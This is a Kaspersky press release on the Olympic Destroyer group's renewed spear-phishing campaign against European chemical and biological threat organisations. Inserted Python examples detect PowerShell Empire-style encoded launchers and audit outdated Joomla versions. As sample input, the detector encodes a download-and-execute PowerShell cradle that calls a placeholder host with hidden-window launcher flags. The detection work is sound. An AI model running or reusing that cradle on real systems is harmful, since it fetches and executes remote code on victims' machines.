Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in Pyeongchang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organizations involved in protection against chemical and biological threats.

 

Olympic Destroyer is an advanced threat that hit organizers, suppliers and partners of the Winter Olympic Games 2018 in Pyeongchang, South Korea with a cybersabotage operation based on a destructive network worm. Many indicators pointed in different directions for the origins of the attack, causing some confusion in the info-security industry in February 2018.

 

A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and Lazarus was unlikely to be the source. Researchers have now found the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolset, and focusing on targets in Europe.

 

The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. One such decoy document referred to the ‘Spiez Convergence’, a bio-chemical threats conference held in Switzerland and organized by the Spiez Laboratory, an organization that played a key role in the Salisbury attack investigation. Another document was targeting an entity of the health and veterinary control authority of Ukraine. Some of the spear-phishing documents uncovered by researchers carry words in Russian and German.

 

All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. An open-source and free framework, widely known as Powershell Empire, was used for the second stage of the attack.
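The press release names PowerShell Empire as the second-stage framework but does not describe what its launcher looks like on an endpoint. The following is an added example (not from Kaspersky's report, and not Empire's own code) of the triage a detection engineer would run over process-creation command lines: it looks for the flag combination Empire's default stager has been widely documented to use (`-noP -sta -w 1 -enc ...`), decodes the `-EncodedCommand` payload, and only escalates when an encoded command is corroborated by a hidden window or by download-and-execute strings in the decoded script. The sample command lines, the stager text and the `example.invalid` host are constructed for the example.

```python
"""Added example, not from the Kaspersky report or from Empire itself: triage
process-creation command lines for the encoded-launcher shape that PowerShell
Empire's default stager has been widely documented to use."""
import base64
import binascii
from typing import Optional

# Strings that commonly appear inside a decoded download-and-execute cradle.
# Generic rather than Empire-specific, so other stagers trip them too.
PAYLOAD_INDICATORS = ("net.webclient", "downloadstring", "iex",
                      "invoke-expression", "frombase64string")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Inverse of encode_ps; None when the blob is not valid base64/UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, ValueError):
        return None


def _is_flag(token: str, full: str, min_len: int) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name,
    so '-w', '-win' and '-WindowStyle' all select WindowStyle."""
    name = token.lower().lstrip("-")
    return len(name) >= min_len and full.startswith(name)


def analyze_command_line(cmd: str) -> dict:
    tokens = cmd.split()
    reasons, encoded = [], None
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok.lower() == "-ec" or _is_flag(tok, "encodedcommand", 1):
            encoded = nxt
            reasons.append("encoded command")
        elif _is_flag(tok, "windowstyle", 1) and nxt.lower() in ("1", "hidden"):
            reasons.append("hidden window")
        elif _is_flag(tok, "noprofile", 3):
            reasons.append("no profile")
        elif _is_flag(tok, "noninteractive", 3):
            reasons.append("non-interactive")
        elif tok.lower() == "-sta":
            reasons.append("sta")

    decoded = decode_ps(encoded) if encoded else None
    hits = [ind for ind in PAYLOAD_INDICATORS if decoded and ind in decoded.lower()]

    # An encoded command is not malicious by itself (admin tooling uses it), so
    # require corroboration: a hidden window, or cradle strings once decoded.
    if encoded and ("hidden window" in reasons or len(hits) >= 2):
        verdict = "suspicious"
    elif encoded:
        verdict = "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "reasons": reasons, "indicators": hits, "decoded": decoded}


# Constructed sample process-creation command lines (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/launcher')"
SAMPLE_EVENTS = [
    # Empire-style launcher shape: no profile, STA, hidden window, encoded command
    "powershell.exe -noP -sta -w 1 -enc " + encode_ps(STAGER),
    # Encoded, but an ordinary admin task with nothing else suspicious
    "powershell.exe -NoProfile -EncodedCommand " + encode_ps("Get-Service wuauserv | Restart-Service"),
    # Ordinary scripted job
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        result = analyze_command_line(cmd)
        print(result["verdict"], result["reasons"], result["indicators"])
```

The "review" tier matters in practice: plenty of legitimate management tooling uses `-EncodedCommand`, so an alert keyed on encoding alone drowns in noise, whereas the hidden-window and decoded-cradle conditions together are rarely seen in scheduled administrative jobs.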

 

The attackers appear to use compromised legitimate web servers to host and control the malware. These servers run a popular open-source content management system (CMS) called Joomla. The researchers found that one of the servers hosting the malicious payload used a version of Joomla (v1.7.3) released in November 2011, which suggests the attackers may have gained access to the servers by exploiting a very outdated CMS installation.
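The practical takeaway for anyone running Joomla is to know which version each host actually reports. As an added example (not from the Kaspersky report or the Joomla project), the script below reads the version string from the install's own manifest, `administrator/manifests/files/joomla.xml`, and flags it against a minimum the operator chooses. The sample manifest is constructed in the layout of a 1.7-era install and trimmed to the fields the audit reads; the minimum version passed in is a placeholder, not a recommendation from the page.

```python
"""Added example, not from the Kaspersky report or the Joomla project: read the
version a Joomla install reports in administrator/manifests/files/joomla.xml
and flag it against a minimum the operator considers acceptable."""
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Constructed sample manifest in the layout of a Joomla 1.7-era install (the
# fields are assumed from that layout and trimmed to what the audit reads).
SAMPLE_MANIFEST = """<extension version="1.7" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>1.7.3</version>
    <creationDate>November 2011</creationDate>
</extension>
"""


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '1.7.3' into (1, 7, 3) so comparison is numeric, not lexical
    ('1.10.0' must sort above '1.7.3', which string comparison gets wrong)."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])


def manifest_version(xml_text: str) -> Optional[str]:
    """Return the <version> text of the manifest, or None if it is absent."""
    node = ET.fromstring(xml_text).find("version")
    return node.text.strip() if node is not None and node.text else None


def audit_manifest(xml_text: str, minimum: str) -> dict:
    """Classify the install as 'ok', 'outdated' or 'unknown' against `minimum`."""
    found = manifest_version(xml_text)
    if found is None:
        return {"version": None, "status": "unknown", "minimum": minimum}
    status = "outdated" if parse_version(found) < parse_version(minimum) else "ok"
    return {"version": found, "status": status, "minimum": minimum}


if __name__ == "__main__":
    import sys
    # Usage: python joomla_audit.py <path to joomla.xml> <minimum version>
    # With no arguments the constructed sample is audited against a placeholder minimum.
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text, minimum = fh.read(), sys.argv[2]
    else:
        text, minimum = SAMPLE_MANIFEST, "3.0.0"
    print(audit_manifest(text, minimum))
```

Run it against every Joomla document root you administer rather than trusting the version a public-facing page advertises; the manifest is what the install itself carries, and the numeric comparison avoids the classic mistake of treating "1.10" as older than "1.7".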

 

Based on Kaspersky Lab telemetry and files uploaded to multi-scanner services, the interests of this Olympic Destroyer campaign appear to have been entities in Germany, France, Switzerland, the Netherlands, Ukraine and Russia.

 

“The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever and showed how easy it is to make a mistake with only fragments of the picture that are visible to researchers. The analysis and deterrence of these threats should be based on cooperation between the private sector and governments across national borders. We hope that by sharing our findings publicly, incident responders and security researchers will be better placed to recognize and mitigate such an attack at any stage in the future,” said Vitaly Kamluk, security researcher in Kaspersky Lab’s GReAT team.

 

In the previous attack, during the Winter Olympic Games, the beginning of the reconnaissance stage was a couple of months before the epidemic of the self-modifying destructive network worm. It is highly possible that Olympic Destroyer is preparing a similar attack with new motives. That is why we advise biological and chemical threat research entities to stay on high alert and launch an out-of-schedule security audit where possible.

 

Kaspersky Lab products successfully detect and block Olympic Destroyer-related malware.

For further information on the return of Olympic Destroyer, including Indicators of Compromise, read the blog on Securelist.
